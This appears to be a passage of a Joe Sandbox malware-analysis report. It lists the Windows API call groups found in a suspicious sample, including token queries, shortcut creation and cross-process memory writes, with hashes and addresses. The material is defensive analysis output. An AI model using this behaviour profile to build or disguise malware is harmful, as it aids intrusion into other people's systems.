                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 97889322c2339895122d7fd3df59e50c0273f848458b496236c59edb8a404eca
                                                        • Instruction ID: 25f763a71df3a3d9be0c4d9ffed86fa4285c8fd014b2de1f95eb23d60eabf8e8
                                                        • Opcode Fuzzy Hash: 97889322c2339895122d7fd3df59e50c0273f848458b496236c59edb8a404eca
                                                        • Instruction Fuzzy Hash: 5E218475A00204AFDB00EFA5DD45A9EBBE5EF49301F048879F85AA7351DB71AD05CB50
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E5AFE3
                                                        • SelectObject.GDI32(?,00000000), ref: 00E5AFF2
                                                        • BeginPath.GDI32(?), ref: 00E5B009
                                                        • SelectObject.GDI32(?,00000000), ref: 00E5B033
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: a79a84e786e992effc882dea0a1bd4049bf15ef6065581c510b3e5b4df1045df
                                                        • Instruction ID: c5a3ecf2ebf0e1c7a4eefe03500cb4bcdcd561ca41b2beaa940961f4750d61eb
                                                        • Opcode Fuzzy Hash: a79a84e786e992effc882dea0a1bd4049bf15ef6065581c510b3e5b4df1045df
                                                        • Instruction Fuzzy Hash: 0321417090020DEFDB109F55EC44B9A7BA9B71035AF18573AF821B61E0D3725859EB51
                                                        APIs
                                                        • __calloc_crt.LIBCMT ref: 00E621A9
                                                        • CreateThread.KERNEL32(?,?,00E622DF,00000000,?,?), ref: 00E621ED
                                                        • GetLastError.KERNEL32 ref: 00E621F7
                                                        • _free.LIBCMT ref: 00E62200
                                                        • __dosmaperr.LIBCMT ref: 00E6220B
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 2664167353-0
                                                        • Opcode ID: e5bc934569fa5c55efdac15b3ec92005b446ffa0bcb34f7194ba537eccb73061
                                                        • Instruction ID: 831bb7773b09b12254010352d3d2689206f85fc223877d650ffa3f6cefd6775e
                                                        • Opcode Fuzzy Hash: e5bc934569fa5c55efdac15b3ec92005b446ffa0bcb34f7194ba537eccb73061
                                                        • Instruction Fuzzy Hash: B9112532188706AFDB11AFA5BC45C9B77E8EF017F8710142DFE24A6151DB32C80196A0
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E7ABD7
                                                        • GetLastError.KERNEL32(?,00E7A69F,?,?,?), ref: 00E7ABE1
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00E7A69F,?,?,?), ref: 00E7ABF0
                                                        • HeapAlloc.KERNEL32(00000000,?,00E7A69F,?,?,?), ref: 00E7ABF7
                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E7AC0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 91cc381056b67d03c171db428e4ba88a58aeac6510491eabf9ffa37006e6027f
                                                        • Instruction ID: ec5c1f91b4f7e0208fecab919e7b61c3be9d63d7decdfe60f64d7c65c4afe571
                                                        • Opcode Fuzzy Hash: 91cc381056b67d03c171db428e4ba88a58aeac6510491eabf9ffa37006e6027f
                                                        • Instruction Fuzzy Hash: 62018CB0205204BFDB114FAADC48DAB7BACEF8A3597144439F809E3260DA72CC46CB61
                                                        APIs
                                                        • CLSIDFromProgID.OLE32 ref: 00E79ADC
                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00E79AF7
                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00E79B05
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E79B15
                                                        • CLSIDFromString.OLE32(?,?), ref: 00E79B21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: a8b537828491134174a60b30cc3d36de0db8d3889aff30082319ef3ce632d2d7
                                                        • Instruction ID: 10377641bf7a5d40e0370d29c1893fdf7a714bed436ef586c97020e613a33857
                                                        • Opcode Fuzzy Hash: a8b537828491134174a60b30cc3d36de0db8d3889aff30082319ef3ce632d2d7
                                                        • Instruction Fuzzy Hash: 22018BB6600208BFDB144F69EC44FAABAEDEF44352F148038F909F2211D772DD059BA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E87A74
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E87A82
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E87A8A
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E87A94
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E87AD0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 9824325278d1c76b65a253d8e5c4b3b1e864020881fe437dd6b4e098e5007f1f
                                                        • Instruction ID: fcd268e5b652ccf41f0132b183933f39c2b074d2d76f40186257739e317aa097
                                                        • Opcode Fuzzy Hash: 9824325278d1c76b65a253d8e5c4b3b1e864020881fe437dd6b4e098e5007f1f
                                                        • Instruction Fuzzy Hash: DD016931C09619EFCF08AFE5DC88AEEBB78FB08711F1500A5E58AB2150DB31965587A1
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E7AADA
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E7AAE4
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E7AAF3
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E7AAFA
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E7AB10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: f3b9a01aa9bcdac686889b0c96170d122e9d8be308caa9aedec50f1c74bb1164
                                                        • Instruction ID: a8e0ba69b2e5e0f6b50b877bab25a636072aad9461f08944951426515d33dd8d
                                                        • Opcode Fuzzy Hash: f3b9a01aa9bcdac686889b0c96170d122e9d8be308caa9aedec50f1c74bb1164
                                                        • Instruction Fuzzy Hash: 3CF06271205208AFEB110FA6EC89E6B3B6DFF85758F044039F945E7190CA629C07DB61
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E7AA79
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E7AA83
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E7AA92
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E7AA99
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E7AAAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: f57984c753b0077dfa1074beefa2c065d9e6986becbe7b83ca553caa87ee917d
                                                        • Instruction ID: 5200654cc2df0ab48a9193a12eae23d4055e9d4d17d7bd38d2aa34f09a87fba2
                                                        • Opcode Fuzzy Hash: f57984c753b0077dfa1074beefa2c065d9e6986becbe7b83ca553caa87ee917d
                                                        • Instruction Fuzzy Hash: 53F0C231205304AFEB101FA6EC89E6B3BACFF89798F044039F905E7190DB629C06CB61
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E7EC94
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E7ECAB
                                                        • MessageBeep.USER32(00000000), ref: 00E7ECC3
                                                        • KillTimer.USER32(?,0000040A), ref: 00E7ECDF
                                                        • EndDialog.USER32(?,00000001), ref: 00E7ECF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 7bdf1cf7a6de665efb557523352b7db5c9358051c8561b6a2cdda5a7f658b74a
                                                        • Instruction ID: 51055737264d068e3bb2a7bcbeaa8ba86ced7b09242bcbd9f60b0fb284ca4294
                                                        • Opcode Fuzzy Hash: 7bdf1cf7a6de665efb557523352b7db5c9358051c8561b6a2cdda5a7f658b74a
                                                        • Instruction Fuzzy Hash: E701D134500744EFEB255B10DE4EF96B7B8FB04709F0055B9B686B11E0DBF2AA59CB40
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 00E5B0BA
                                                        • StrokeAndFillPath.GDI32(?,?,00EBE680,00000000,?,?,?), ref: 00E5B0D6
                                                        • SelectObject.GDI32(?,00000000), ref: 00E5B0E9
                                                        • DeleteObject.GDI32 ref: 00E5B0FC
                                                        • StrokePath.GDI32(?), ref: 00E5B117
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: da5cea9ae0ef2c3d99b0cbf186224c9c0adad98e22a6c6102eae69b9325ff63f
                                                        • Instruction ID: f3e37f12da8cd26fcb6ef1c64e5e1637b8a6bd0dc7abaebf60aa94b2983786ec
                                                        • Opcode Fuzzy Hash: da5cea9ae0ef2c3d99b0cbf186224c9c0adad98e22a6c6102eae69b9325ff63f
                                                        • Instruction Fuzzy Hash: B6F0C93000564CEFDB219F6AED0DB953BA6B710366F088325F825650F0C773895AEF50
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00E8F2DA
                                                        • CoCreateInstance.OLE32(00ECDA7C,00000000,00000001,00ECD8EC,?), ref: 00E8F2F2
                                                        • CoUninitialize.OLE32 ref: 00E8F555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize
                                                        • String ID: .lnk
                                                        • API String ID: 948891078-24824748
                                                        • Opcode ID: a6d8d90d11672d5cfc7cc7a95f1920ea387aad202df06be371cfee8114543ee0
                                                        • Instruction ID: 9d84c8819d84ab8e04999ddadd9508d6d18932043283fb732c249d787c13121b
                                                        • Opcode Fuzzy Hash: a6d8d90d11672d5cfc7cc7a95f1920ea387aad202df06be371cfee8114543ee0
                                                        • Instruction Fuzzy Hash: F7A13D71104201AFD300EF64DC81DABB7ECEF99714F40592DF699A7292EB71EA09CB52
                                                        APIs
                                                          • Part of subcall function 00E4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E453B1,?,?,00E461FF,?,00000000,00000001,00000000), ref: 00E4662F
                                                        • CoInitialize.OLE32(00000000), ref: 00E8E85D
                                                        • CoCreateInstance.OLE32(00ECDA7C,00000000,00000001,00ECD8EC,?), ref: 00E8E876
                                                        • CoUninitialize.OLE32 ref: 00E8E893
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 733b1ab5954d1a6283bdb5591eb13dcafdcd181a346016740aa8591afb984b0e
                                                        • Instruction ID: 635d7d1b52a4e2112f03a00ca002e188109aef7a5775713271e95468a5a0e33a
                                                        • Opcode Fuzzy Hash: 733b1ab5954d1a6283bdb5591eb13dcafdcd181a346016740aa8591afb984b0e
                                                        • Instruction Fuzzy Hash: 47A145356043019FCB14EF14C884D6ABBE5FF89714F148998F99AAB3A2CB31ED45CB91
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E632ED
                                                          • Part of subcall function 00E6E0D0: __87except.LIBCMT ref: 00E6E10B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 4e1f4ce55b20c3c1b591d38e6e387b33a46b98a9b5a82d01bf91c3b779a21001
                                                        • Instruction ID: 3c1572a6e502c84f61212bbee9edba141f267009d33a6311e41d19b45fa8d40f
                                                        • Opcode Fuzzy Hash: 4e1f4ce55b20c3c1b591d38e6e387b33a46b98a9b5a82d01bf91c3b779a21001
                                                        • Instruction Fuzzy Hash: 39518B35AC920186CB117724F9213BA2BD4DB417D4F20BD29F095B23F9EF348E88A641
                                                        APIs
                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00EDDC50,?,0000000F,0000000C,00000016,00EDDC50,?), ref: 00E84645
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00E846C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                        • String ID: REMOVE$THIS
                                                        • API String ID: 3797816924-776492005
                                                        • Opcode ID: 40314a1dc9c6ac9af70ea645f15e2770331221e2b19293065f206b30f40b6820
                                                        • Instruction ID: 784a58edb5a819ab535d25763ed9390bebcd7266d19e881ff0eb4f1e3797c56d
                                                        • Opcode Fuzzy Hash: 40314a1dc9c6ac9af70ea645f15e2770331221e2b19293065f206b30f40b6820
                                                        • Instruction Fuzzy Hash: AD416DB4A0021A9FCF01EFA4C881AAEB7F4FF45304F149469E91ABB292D7359D45CB50
                                                        APIs
                                                          • Part of subcall function 00E8430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E7BC08,?,?,00000034,00000800,?,00000034), ref: 00E84335
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E7C1D3
                                                          • Part of subcall function 00E842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E7BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00E84300
                                                          • Part of subcall function 00E8422F: GetWindowThreadProcessId.USER32(?,?), ref: 00E8425A
                                                          • Part of subcall function 00E8422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E8426A
                                                          • Part of subcall function 00E8422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00E84280
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E7C240
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E7C28D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: ae3617241fe689cc27a3e94ea5d65aeb8adb3f1b03d9533449f47748ed7f011a
                                                        • Instruction ID: 75f7b6b19857b8c1c7e35e1bd8e9f69d52f937099c59a436f5f2df403df3ce66
                                                        • Opcode Fuzzy Hash: ae3617241fe689cc27a3e94ea5d65aeb8adb3f1b03d9533449f47748ed7f011a
                                                        • Instruction Fuzzy Hash: 07414C7290021DBFDB11EFA4CC81AEEB7B8EF09300F109099FA49B7191DA716E45CB61
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EDDC00,00000000,?,?,?,?), ref: 00EAA6D8
                                                        • GetWindowLongW.USER32 ref: 00EAA6F5
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EAA705
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 824835f95e3c672aac81d722a6b8d13fb3f774803021701ef83c8f68f0b54dd0
